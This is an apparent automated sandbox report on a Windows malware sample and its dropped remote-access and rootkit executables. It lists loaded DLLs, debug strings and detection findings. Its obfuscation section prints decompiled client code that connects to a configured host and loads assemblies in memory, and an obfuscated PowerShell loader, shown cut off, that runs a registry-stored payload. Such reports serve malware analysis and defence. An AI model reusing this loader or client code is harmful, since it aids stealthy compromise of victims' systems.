                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: apphelp.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: pdh.dll
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: Deadsvchost.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\Public\Deadsvchost.exe
                        Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: aoKTzGQSRP.exeStatic file information: File size 10214400 > 1048576
                        Source: aoKTzGQSRP.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x9ac400
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: CMaker 2.0.exe, 00000005.00000002.2263462576.00007FFD93590000.00000040.00000001.01000000.00000017.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: CMaker 2.0.exe, 00000005.00000002.2261490839.00007FFD8F632000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2261490839.00007FFD8F632000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: CMaker 2.0.exe, 00000002.00000003.2153120830.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2269341055.00007FFDA4341000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: CMaker 2.0.exe, 00000002.00000003.2153120830.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2269341055.00007FFDA4341000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: CMaker 2.0.exe, 00000005.00000002.2262592946.00007FFD8FB3B000.00000040.00000001.01000000.00000009.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: CMaker 2.0.exe, 00000005.00000002.2270072340.00007FFDA5491000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: CMaker 2.0.exe, 00000005.00000002.2267528583.00007FFDA32F1000.00000040.00000001.01000000.0000000C.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: CMaker 2.0.exe, 00000005.00000002.2268863981.00007FFDA3AE1000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: CMaker 2.0.exe, 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: CMaker 2.0.exe, 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: CMaker 2.0.exe, 00000005.00000002.2269787988.00007FFDA4DA1000.00000040.00000001.01000000.00000014.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: CMaker 2.0.exe, 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: CMaker 2.0.exe, 00000005.00000002.2268396288.00007FFDA3A81000.00000040.00000001.01000000.00000018.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: CMaker 2.0.exe, 00000005.00000002.2269100050.00007FFDA4161000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2253563049.0000022D32BE0000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: DeadXClient.exe.4.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: DeadXClient.exe.4.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: DeadROOTkit.exe.4.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: DeadROOTkit.exe.4.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: DeadROOTkit.exe.4.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Deadsvchost.exe.6.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Deadsvchost.exe.6.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        .NET source code contains potential unpacker
                        Source: DeadXClient.exe.4.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                        Source: DeadXClient.exe.4.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                        Source: DeadXClient.exe.4.dr, Messages.cs.Net Code: Memory
                        Source: DeadROOTkit.exe.4.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                        Source: DeadROOTkit.exe.4.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                        Source: DeadROOTkit.exe.4.dr, Messages.cs.Net Code: Memory
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs.Net Code: Memory
                        Source: Deadsvchost.exe.6.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                        Source: Deadsvchost.exe.6.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                        Source: Deadsvchost.exe.6.dr, Messages.cs.Net Code: Memory
                        Found suspicious powershell code related to unpacking or dynamic code loading
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($yudsyoexNPPoGc,$BQVbDmmpYciFvEPZCVf).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$xjZyvNWKEgRcmEMjl=$mfOCIRUxBUWIVl.Invoke($Null
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('Dead'+'s'+''+[Char](116)+''+[Char](97)+'ger')).EntryPoint.I
                        Obfuscated command line found
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[